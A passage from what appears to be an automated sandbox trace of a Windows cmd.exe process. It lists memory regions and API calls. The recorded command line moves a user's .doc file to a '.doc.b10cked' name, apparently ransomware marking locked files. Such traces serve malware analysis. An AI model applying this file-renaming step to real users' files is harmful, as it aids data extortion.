entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13740 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13741 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13742 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13743 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13744 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13745 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13746 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13747 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13748 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14003 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14004 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14005 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14006 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 14007 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 14008 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14009 start_va = 
0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14010 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14011 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14012 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14013 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14014 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14015 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14016 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14097 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 
"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14100 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 14101 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 14102 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14103 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14104 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 14105 start_va = 0x5a0000 end_va = 0x702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 14106 start_va = 0x750000 end_va = 0x134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Thread: id = 198 os_tid = 0xa0c [0136.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa34 | out: lpSystemTimeAsFileTime=0x30fa34*(dwLowDateTime=0x8b27c0e0, dwHighDateTime=0x1d440a9)) [0136.269] GetCurrentProcessId () returned 0xa18 [0136.269] GetCurrentThreadId () returned 0xa0c [0136.269] GetTickCount () returned 0x2b135 [0136.269] QueryPerformanceCounter (in: lpPerformanceCount=0x30fa2c | out: lpPerformanceCount=0x30fa2c*=19305871557) returned 1 [0136.270] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.270] __set_app_type (_Type=0x1) [0136.270] __p__fmode () 
returned 0x76b331f4 [0136.270] __p__commode () returned 0x76b331fc [0136.270] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.271] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.271] GetCurrentThreadId () returned 0xa0c [0136.271] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa0c) returned 0x38 [0136.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.271] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.322] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f9c4 | out: phkResult=0x30f9c4*=0x0) returned 0x2 [0136.322] VirtualQuery (in: lpAddress=0x30f9fb, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x213000, AllocationBase=0x210000, 
AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.322] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.322] GetConsoleOutputCP () returned 0x1b5 [0136.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.325] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.339] GetEnvironmentStringsW () returned 0x4b01c8* [0136.339] FreeEnvironmentStringsW (penv=0x4b01c8) returned 1 [0136.339] GetEnvironmentStringsW () returned 0x4b01c8* [0136.339] FreeEnvironmentStringsW (penv=0x4b01c8) returned 1 [0136.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e934 | out: phkResult=0x30e934*=0x40) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x4) returned 0x0 [0136.339] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.339] RegCloseKey (hKey=0x40) returned 0x0 [0136.339] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e934 | out: phkResult=0x30e934*=0x40) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x40, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, 
lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x1, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x0, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x4, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x4) returned 0x0 [0136.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e93c, lpData=0x30e940, lpcbData=0x30e938*=0x1000 | out: lpType=0x30e93c*=0x0, lpData=0x30e940*=0x9, lpcbData=0x30e938*=0x1000) returned 0x2 [0136.340] RegCloseKey (hKey=0x40) returned 0x0 [0136.340] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.340] srand (_Seed=0x5b88636a) [0136.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" [0136.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" [0136.340] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b1928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.341] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.341] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.341] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.341] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.341] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.341] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.341] GetEnvironmentStringsW () returned 0x4b2318* [0136.341] FreeEnvironmentStringsW (penv=0x4b2318) returned 1 [0136.341] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.341] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.341] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.341] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0136.341] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.341] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.341] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.341] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.341] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.341] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.342] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.342] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f700, lpFilePart=0x30f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f6fc*="Desktop") returned 0x18 [0136.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f47c | out: lpFindFileData=0x30f47c) returned 0x4b0058 [0136.342] FindClose (in: hFindFile=0x4b0058 | out: hFindFile=0x4b0058) returned 1 [0136.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.342] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.343] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.343] 
GetEnvironmentStringsW () returned 0x4b2b38* [0136.343] FreeEnvironmentStringsW (penv=0x4b2b38) returned 1 [0136.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.343] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f840, cchData=128 | out: lpLCData="0") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f840, cchData=128 | out: lpLCData="0") returned 2 [0136.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f840, cchData=128 | out: lpLCData="1") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, 
cchData=8 | out: lpLCData=".") returned 2 [0136.373] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.373] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.374] GetConsoleTitleW (in: lpConsoleTitle=0x4a0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.387] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.387] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.388] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.388] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.388] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.388] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.388] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.388] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.388] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.388] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.388] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.391] GetConsoleTitleW (in: lpConsoleTitle=0x30f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.431] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.431] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.431] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.431] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.431] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.431] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.431] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.431] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.431] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.431] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.431] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.431] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.431] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.431] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.432] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.432] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.432] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.432] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.432] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.433] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.433] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f2ec, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.433] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp 
